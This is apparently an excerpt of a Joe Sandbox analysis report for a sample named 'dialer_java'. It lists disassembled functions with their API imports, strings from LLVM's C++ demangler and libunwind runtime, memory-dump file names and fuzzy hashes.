memcpy.MSVCRT ref: 00007FF695DD13B5

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DD1E5C
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF695DD1E55

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: mallocmemcpystrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 3344349799-3503049562
Opcode ID: 411cc94d638b4c5a65666b04f682356d8a7e8c8d03e2840adf31fc5fabca7cb3
Instruction ID: 89a3e97b9a2c42f17fec4329da05f2eaf85f5d7a852cb4f26edaf1b0d4c0553d
Opcode Fuzzy Hash: 411cc94d638b4c5a65666b04f682356d8a7e8c8d03e2840adf31fc5fabca7cb3
Instruction Fuzzy Hash: AE416322A09B4682EA71DB55F40017EA3E4EB41B80F541276DE8E87F55EF3CF949C744

Function 00007FF695DDF160 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDF1A9
realloc.MSVCRT ref: 00007FF695DDF1F5
realloc.MSVCRT ref: 00007FF695DDF277
_assert.MSVCRT ref: 00007FF695DDF2C8

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/Utility.h, xrefs: 00007FF695DDF2BB
CurrentPosition, xrefs: 00007FF695DDF2B4

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$_assert
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/Utility.h$CurrentPosition
API String ID: 940201557-3339543485
Opcode ID: 7acef73fbec41d6dfa1be67c13337ccc807f794cd771a4b3e4e2917c685efc0b
Instruction ID: b77e57ede0755b28ff3b26142e964f27a791465606ac35f3fad9d55147c50c46
Opcode Fuzzy Hash: 7acef73fbec41d6dfa1be67c13337ccc807f794cd771a4b3e4e2917c685efc0b
Instruction Fuzzy Hash: 194157B6A05F4682EF35CF56E44027967A1EB58F80F049672CF8E87794DF2CE845C604

Function 00007FF695DE8410 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF695DE842F
wcscpy.MSVCRT ref: 00007FF695DE8490
wcscat.MSVCRT ref: 00007FF695DE849B
wcslen.MSVCRT ref: 00007FF695DE84AC

Strings

, xrefs: 00007FF695DE850B
0, xrefs: 00007FF695DE84D9
@, xrefs: 00007FF695DE84E1

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: memsetwcscatwcscpywcslen
String ID: $0$@
API String ID: 468205783-2347541974
Opcode ID: e183844e820dd185498d54a444cfdf65eda0e2a936280ba6ff7fda81fa3f1c34
Instruction ID: ec1dfc33be49944cb7fed7e14123f18996268d4894b3a3b091847cbae6b1b252
Opcode Fuzzy Hash: e183844e820dd185498d54a444cfdf65eda0e2a936280ba6ff7fda81fa3f1c34
Instruction Fuzzy Hash: 63418361D2C68285F720CB14F9043B9E7E0EBC5B44F0012B9E68D866A5DFBED94DCB05

Function 00007FF695DDB364 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDB3E6
memcpy.MSVCRT ref: 00007FF695DDB400
_assert.MSVCRT ref: 00007FF695DDB42A

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DDB41D
basic_string, xrefs: 00007FF695DDB364
starts_with(SV, "basic_"), xrefs: 00007FF695DDB416

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basic_string$starts_with(SV, "basic_")
API String ID: 2326172077-800580732
Opcode ID: 1cf50003512e3ea4dae628e96ebf30add7ca9d163f89edfb160867659c8d9a78
Instruction ID: cadd91a147e5c3dc6aa4f12090bea2139acb09cc1e9c737e50a4697f237efe0b
Opcode Fuzzy Hash: 1cf50003512e3ea4dae628e96ebf30add7ca9d163f89edfb160867659c8d9a78
Instruction Fuzzy Hash: C101D6B2F05B4282EA34DB15F4802BC63A1EF14BC4F405675CA4D87754EF2CE98D8704

Function 00007FF695DDAA50 Relevance: 9.3, APIs: 6, Instructions: 291stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DDAB61
malloc.MSVCRT ref: 00007FF695DDAC3F
malloc.MSVCRT ref: 00007FF695DDACD3
strlen.MSVCRT ref: 00007FF695DDAD56
malloc.MSVCRT ref: 00007FF695DDAD7D
realloc.MSVCRT ref: 00007FF695DDAE58

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc$reallocstrlen
String ID:
API String ID: 2374275640-0
Opcode ID: 9fcff9b977f65c3a391a145938d85213577a97e659ce38ebb67324265da1d897
Instruction ID: 4e16031022b31623829c92c710fbbdcc13899ad097202b4008b9773f1adef618
Opcode Fuzzy Hash: 9fcff9b977f65c3a391a145938d85213577a97e659ce38ebb67324265da1d897
Instruction Fuzzy Hash: E4C10372609BC281EB258B24D0503AD67E9EB44F81F489376CB8D877D5EF6CE95AC304

Function 00007FF695DD8DB0 Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD8DEE
realloc.MSVCRT ref: 00007FF695DD8E72
realloc.MSVCRT ref: 00007FF695DD8ECD
realloc.MSVCRT ref: 00007FF695DD8F2B
realloc.MSVCRT ref: 00007FF695DD8F7C
memcpy.MSVCRT ref: 00007FF695DD8F96

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 30d2cb59483826d978f11d2be31c172a2ece989509a146521bc4926f218ec95d
Instruction ID: 1b3d4f7e5bfd48386a181493c49f43cf672fa63e9f402838259db895f3b2bea3
Opcode Fuzzy Hash: 30d2cb59483826d978f11d2be31c172a2ece989509a146521bc4926f218ec95d
Instruction Fuzzy Hash: C75182B2A05B8682DE398F56F44026DA3A2EB54FC4F049672CB9E47B91DF3CE9558300

Function 00007FF695DD5E30 Relevance: 9.1, APIs: 6, Instructions: 140COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD5E78
memcpy.MSVCRT ref: 00007FF695DD5E96
realloc.MSVCRT ref: 00007FF695DD5ED8
realloc.MSVCRT ref: 00007FF695DD5F35
realloc.MSVCRT ref: 00007FF695DD5F87
realloc.MSVCRT ref: 00007FF695DD5FE8

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: d16cc2fde265a49c118596b96dd5b5cfa61d07f1c591749a92ff39ed06f51163
Instruction ID: dc6037a8c88f43a3aa6869e6b621b9bb3f9a588703640196e5709053fd782207
Opcode Fuzzy Hash: d16cc2fde265a49c118596b96dd5b5cfa61d07f1c591749a92ff39ed06f51163
Instruction Fuzzy Hash: 7C515DB2A05B4683EB399F56F450269B3A1FB58BC0F448676CB8E47B91EF3CE5458340

Function 00007FF695DD6030 Relevance: 9.1, APIs: 6, Instructions: 128COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD6078
memcpy.MSVCRT ref: 00007FF695DD6096
realloc.MSVCRT ref: 00007FF695DD60D1
realloc.MSVCRT ref: 00007FF695DD6155
realloc.MSVCRT ref: 00007FF695DD61AB
memcpy.MSVCRT ref: 00007FF695DD61C5

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 6905e7ca18b6a58da2f216068c29ad50521c822ba058662085adb930a16d6f30
Instruction ID: 6c7012274147b83ef287b0fbd89d6ef6755d6bcce00f8c3d35ea7742bf57cac5
Opcode Fuzzy Hash: 6905e7ca18b6a58da2f216068c29ad50521c822ba058662085adb930a16d6f30
Instruction Fuzzy Hash: 2F5171B2A06B4682DE388F56F45026DA3A1EB58FC4F449672CF8E47791EF3CE8558340

Function 00007FF695DC4F64 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF695DC4F78
TlsGetValue.KERNEL32 ref: 00007FF695DC4FAF
GetLastError.KERNEL32 ref: 00007FF695DC4FB4
LeaveCriticalSection.KERNEL32 ref: 00007FF695DC5072
free.MSVCRT ref: 00007FF695DC5094
DeleteCriticalSection.KERNEL32 ref: 00007FF695DC50BD

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
String ID:
API String ID: 3326252324-0
Opcode ID: 08f0997568cc7a319e12c3eb93543c3c92b5c3fd4d446526cdcdb6b294db1472
Instruction ID: b91b7d0f0fe270fe11660d1c833822f88c342c9c08b7f54c0240efdfb6b1e4e9
Opcode Fuzzy Hash: 08f0997568cc7a319e12c3eb93543c3c92b5c3fd4d446526cdcdb6b294db1472
Instruction Fuzzy Hash: 7E21D824E19A0285FA75CB51EA5037823E0FF40F91F6426B1C91ED76A4DF2EAC8ED344

Function 00007FF695DDED80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DDEDB1
realloc.MSVCRT ref: 00007FF695DDEE68
realloc.MSVCRT ref: 00007FF695DDEEFF

Strings

vector[, xrefs: 00007FF695DDEE7D
pixel ve, xrefs: 00007FF695DDEE8C

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$malloc
String ID: vector[$pixel ve
API String ID: 454241450-4216275618
Opcode ID: c7e31e28da302632c023a726f4a17732f91bf8205f05fac472730efd64aa863f
Instruction ID: 39f3f5dc4ef7de966a6ddf5957f4e5beabdef261de12ae0447b8cb327a126904
Opcode Fuzzy Hash: c7e31e28da302632c023a726f4a17732f91bf8205f05fac472730efd64aa863f
Instruction Fuzzy Hash: 4A41F2B2A05B8582DA28CF16E4446AD77B5FB58FC0F018672CF8D87BA0DF38D9568304

Function 00007FF695DD0BE5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF695DD0B79
malloc.MSVCRT ref: 00007FF695DD0C1B
_assert.MSVCRT ref: 00007FF695DD1E69
malloc.MSVCRT ref: 00007FF695DD1EB6

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DD1E5C
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF695DD1E55

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc$_assertstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 3012236610-3503049562
Opcode ID: 01387742c7347a065d0d3fa100ad1a8c0eb405b46fc2f649a98275b690413a58
Instruction ID: d61fcebf47aab51979829363a45c4ce94bbc0fc908ff5795fdcbac7bab66abcf
Opcode Fuzzy Hash: 01387742c7347a065d0d3fa100ad1a8c0eb405b46fc2f649a98275b690413a58
Instruction Fuzzy Hash: B541F432616B8185EB21CB18E4047A837A8EB44F91F165375DF5C4B7A1EF38EA9AC314

Function 00007FF695DD87F0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD8833
realloc.MSVCRT ref: 00007FF695DD889B

Strings

> typena, xrefs: 00007FF695DD88AC
template, xrefs: 00007FF695DD8848
ame , xrefs: 00007FF695DD88BA

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: > typena$ame $template
API String ID: 471065373-2892875084
Opcode ID: 9e9012e4aaa5198cb7273f277177ca7dcf34f7861e77788661574f326ce0afe6
Instruction ID: 6a2275b6bc742e060ace0c408193ba5ce6ba6b1bd823dd8b1d9d161fd0d74519
Opcode Fuzzy Hash: 9e9012e4aaa5198cb7273f277177ca7dcf34f7861e77788661574f326ce0afe6
Instruction Fuzzy Hash: CB316FF2A05B4582DE29DF16F544169A7A1FB98FC0F008672CF8D47754EF38D9968700

Function 00007FF695DDA260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDA298
realloc.MSVCRT ref: 00007FF695DDA2F7
realloc.MSVCRT ref: 00007FF695DDA37B

Strings

sizeof.., xrefs: 00007FF695DDA2AD
&, xrefs: 00007FF695DDA31C

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: &$sizeof..
API String ID: 471065373-1098962357
Opcode ID: adf8345375f33b976376b6f3066ba57d42a7cef233737129a130052d44d8b66c
Instruction ID: b812a7db288970f245979fa73ab329611ca08d08d763393afa13f3896f89a38f
Opcode Fuzzy Hash: adf8345375f33b976376b6f3066ba57d42a7cef233737129a130052d44d8b66c
Instruction Fuzzy Hash: 31318FB2A06B8682EA25DF45F4442ADB3A5EB54BC4F00D631DB8E47B91EF3CD5458700

Function 00007FF695DDE920 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDE970
realloc.MSVCRT ref: 00007FF695DDE9CB
realloc.MSVCRT ref: 00007FF695DDEA27

Strings

restric, xrefs: 00007FF695DDEA38
volatil, xrefs: 00007FF695DDE9DC

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: restric$ volatil
API String ID: 471065373-3617781792
Opcode ID: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
Instruction ID: a9ce90665285883ec59e0b5f665f798bca33f149efed212e41bee6b6bfd7bf38
Opcode Fuzzy Hash: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
Instruction Fuzzy Hash: 49415EB2A05B8682DE28CF46F544269B7A1EB94FC4F009532DB9E477A0EF3CE845C340

Function 00007FF695DC3D90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF695DC3E24
fflush.MSVCRT ref: 00007FF695DC3E7E

Strings

libunwind: __libunwind_seh_personality() calling LanguageHandler %p(%p, %p, %p, %p), xrefs: 00007FF695DC3E05
libunwind: __libunwind_seh_personality() LanguageHandler returned %d, xrefs: 00007FF695DC3E62
CCG , xrefs: 00007FF695DC3E0C

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fflush
String ID: CCG $libunwind: __libunwind_seh_personality() LanguageHandler returned %d$libunwind: __libunwind_seh_personality() calling LanguageHandler %p(%p, %p, %p, %p)
API String ID: 497872470-3214979313
Opcode ID: 5331a38f71f5f04ee22fa3a2a17e78d251d856f83c24bee91c8b074b7409e614
Instruction ID: cd0dbde6d91709d977e71fe35f0b3156f7091422c70ab96c76eda741e89df8a5
Opcode Fuzzy Hash: 5331a38f71f5f04ee22fa3a2a17e78d251d856f83c24bee91c8b074b7409e614
Instruction Fuzzy Hash: 61318B22E08A4281EB309B65E4413BDA3A5FF85B84F04527AEE8D87795DF3CD8498748

Function 00007FF695DDB468 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 38COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF695DDB4FB

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DDB4EE
basic_string, xrefs: 00007FF695DDB46D
starts_with(SV, "basic_"), xrefs: 00007FF695DDB4E7
basi, xrefs: 00007FF695DDB4B2

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: _assert
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basi$basic_string$starts_with(SV, "basic_")
API String ID: 1222420520-1046023109
Opcode ID: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
Instruction ID: 710ffdf32a9eefdabd31442b780a640ea5ef37a82f0ccaeb2e5f9258782f72e6
Opcode Fuzzy Hash: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
Instruction Fuzzy Hash: 6BF0B4B1A06A1281F6708B08E440B3872A0EB45F68F50E374C52D87AD0DF2D991EC704

Function 00007FF695DDFBC0 Relevance: 7.7, APIs: 5, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF695DDFED0: realloc.MSVCRT ref: 00007FF695DDFF80
Part of subcall function 00007FF695DDFED0: free.MSVCRT ref: 00007FF695DE0085

realloc.MSVCRT ref: 00007FF695DDFC66
realloc.MSVCRT ref: 00007FF695DDFD02
realloc.MSVCRT ref: 00007FF695DDFD6A
memcpy.MSVCRT ref: 00007FF695DDFD87
realloc.MSVCRT ref: 00007FF695DDFE6D

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
